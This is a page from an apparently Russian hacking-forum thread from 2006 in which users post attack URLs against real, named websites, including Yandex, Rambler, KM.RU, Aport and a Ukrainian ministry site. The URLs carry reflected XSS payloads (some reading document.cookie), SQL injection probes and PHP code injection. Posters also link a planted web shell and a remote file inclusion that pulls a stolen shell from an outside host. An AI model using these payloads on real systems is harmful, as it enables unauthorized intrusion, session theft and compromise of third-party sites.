ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Баги на сайтах.
   
Закрытая тема
Страница 7 из 30 « Первая < 3 4 5 6 7 8 9 10 11 17 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 25.04.2006, 22:27
Vandal
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281

Репутация: 23
Отправить сообщение для Vandal с помощью Yahoo
По умолчанию
_http://www.hedegaard.nu/image/set.php


Шелл тут прикольный .Я думал все юзают r57shell 124
Последний раз редактировалось Vandal; 25.04.2006 в 23:33..
 

  #62  
Старый 28.04.2006, 18:55
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию
http://suncity.combats.ru/enter.pl?step=1&add=1&login='><script>alert(/testing_by_censored!/)</script>>

http://capitalcity.combats.ru/enter.pl?login="><script>alert(/testing_by_censored!/)</script>&step=2&reminder=1234567

----------

http://rrc.territory.ru/register1.php?next=1&code=&num=&edit%5BNICK%5D=">< script>alert(/testing_by_censored!/)</script>

http://rrc.territory.ru/error.php?msg=Внимание!%20Всем%20иг окам%20надо%20пройти%20заново %20систему%20регистрации!%20p.s. Проходить%20ее%20надо%20на%20anti chat.ru%20=)

----------

http://forum.siemens-club.ru/member.php?Action=viewprofile&username=<script>ale rt(/testing_by_censored!/)</script>
__________________
+ (это не крестик, это плюсик!)
__________________
 

  #63  
Старый 28.04.2006, 22:31
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию
_http://www.schooljournals.net/index.php?output=CommentsPage(PHP CODE)

exmpl:

_http://www.schooljournals.net/index.php?output=CommentsPage(phpinfo())

Стоит фильтрация на все спецсимволы. Как обходить - читаем http://forum.antichat.ru/thread18219.html
 

  #64  
Старый 29.04.2006, 09:42
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию
 

  #65  
Старый 29.04.2006, 09:44
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию
http://www.mirt-service.ru/constructor.php?manufacturer=1'

http://mp3plus.ru/album.php?id=4796&art=1247'
 

  #66  
Старый 29.04.2006, 20:39
gLAnce
Познающий
Регистрация: 24.04.2006
Сообщений: 33
Провел на форуме:
193665

Репутация: 50
По умолчанию
только что, случано нашел (работает только в IE)

_http://www.yandex.ru/yandsearch?text=gLAnce_was_here&stype="><script>al ert('found_by_gLAnce')</script>
_http://images.yandex.ru/yandsearch?rpt="><script>alert('found_by_gLAnce')</script>&text=xaxa
Последний раз редактировалось gLAnce; 29.04.2006 в 20:41..
 

  #67  
Старый 30.04.2006, 12:47
gLAnce
Познающий
Регистрация: 24.04.2006
Сообщений: 33
Провел на форуме:
193665

Репутация: 50
По умолчанию
делаемся так. Знаю что некоторые XSS уже выкладывали но всетаки удобно когда все собрано в одно место
XSS НА ИЗВЕСТНЫХ RUSS-ПОИСКОВИКАХ

Yandex.RU - Internet Explorer
_http://www.yandex.ru/yandsearch?text=gLAnce_was_here&stype="><script>al ert('found_by_gLAnce')</script>
_http://images.yandex.ru/yandsearch?rpt="><script>alert('found_by_gLAnce')</script>&text=xaxa
_http://news.yandex.ru/yandsearch?rpt=nnews2&grhow=clutop&text=sasa&doSea rch="><script>alert('found')</script>

Rambler.RU
_http://www.rambler.ru/db/news/msg.html?mid='"><script>alert('found_by_gLAnce')</script>
_http://weather.rambler.ru/index.html?search=<script>alert('found_by_gLAnce') </script>
_http://tv.rambler.ru/index.html?channel_id="><script>alert('found_by_gL Ance')</script>
_http://foto.rambler.ru/srch?control_charset=huy&sort=0&set=photo&words="> <script>alert('found_by_gLAnce')</script>
_http://horoscopes.rambler.ru/day.html?day=1%22%3E%3Cscript%3Ealert%28%27found_b y_gLAnce%27%29%3C%2Fscript%3E&month=4&year=1965&ge nder=f
_http://www.rambler.ru/db/news/news.html?s="><script>alert(found_by_gLAnce)</script>
_http://cla.rambler.ru/?action=login&error[l_login][value]=privet"><script>javascript:alert(document.cookie) </script>
_http://olymp2006.rambler.ru/winners.html?day=http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert(/XSS/)%3C/script%3E

KM.RU
_http://go.km.ru/index.asp?idr=4&ids=&wdv=0&mrv=1&dti=0&dtv=6&idt=& ann=1&srt=0&itp=2&osq=%3Cscript%3Ealert+%28found_b y_gLAnce%29%3C%2Fscript%3E&P1=&P2=&P3=&ext=0&opt=0 &hlp=0&sr=0&sq=%3Cscript%3Ealert+%28%27found_by_gL Ance%27%29%3C%2Fscript%3E
_http://conference.km.ru/add_question.asp?id="><script>alert('found_by_gLAn ce')</script>
вобщем на км.ру полно css, все писать сюда не буду

Aport.RU
_http://www.aport.ru/help/?p="><script>alert%20('found-by-gLAnce')</script>
_http://ec.aport.ru/scripts/template.dll?r="><script>alert%20('i_vot_tak_vot') </script>&That=goods&Base=eshop&Rt=2&Tn=
_http://sm.aport.ru/scripts/template.dll?That=std&r=\"><script>alert%20(/found_by_gLAnce/)</script>
Последний раз редактировалось gLAnce; 30.04.2006 в 12:50..
 

  #68  
Старый 30.04.2006, 17:32
haZard0us
Познающий
Регистрация: 18.04.2006
Сообщений: 31
Провел на форуме:
202783

Репутация: 17
По умолчанию
http://www.mon.gov.ua

вбиваем в поиск "><script>alert(document.cookie)</script> и наслаждаемся резалтом

http://www.mon.gov.ua/phpbb/docs/ -- смотрим резалт (для ленивых -

Warning: Failed opening 'phpbb/docs//main.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/spool/www.mstu.gov.ua/main.php on line 205) ),
немного подумав уже наталкивает на мысли =)
 

  #69  
Старый 01.05.2006, 11:02
KaMiKadZe
Участник форума
Регистрация: 24.02.2006
Сообщений: 206
Провел на форуме:
2735257

Репутация: 103
По умолчанию
_http://www.hedegaard.nu/index.php?p=http://k1on.nm.ru/conf.php сс что спер чей то шелл своего нету)))
 

  #70  
Старый 01.05.2006, 14:38
gLAnce
Познающий
Регистрация: 24.04.2006
Сообщений: 33
Провел на форуме:
193665

Репутация: 50
По умолчанию
_http://wordstat.yandex.ru/advq?rpt=ppc&shw="><script>alert%20(/found_by_gLAnce/)</script>
 
Закрытая тема
Страница 7 из 30 « Первая < 3 4 5 6 7 8 9 10 11 17 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Sql Injections на сайтах Укртелекома Nova Уязвимости 9 23.03.2006 00:35
"Яндекс" будет показывать контекстную рекламу на обычных сайтах dinar_007 Мировые новости 0 23.12.2005 16:22
Xss баги на забугорных сайтах... x-ultra-x Уязвимости 7 07.10.2005 17:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ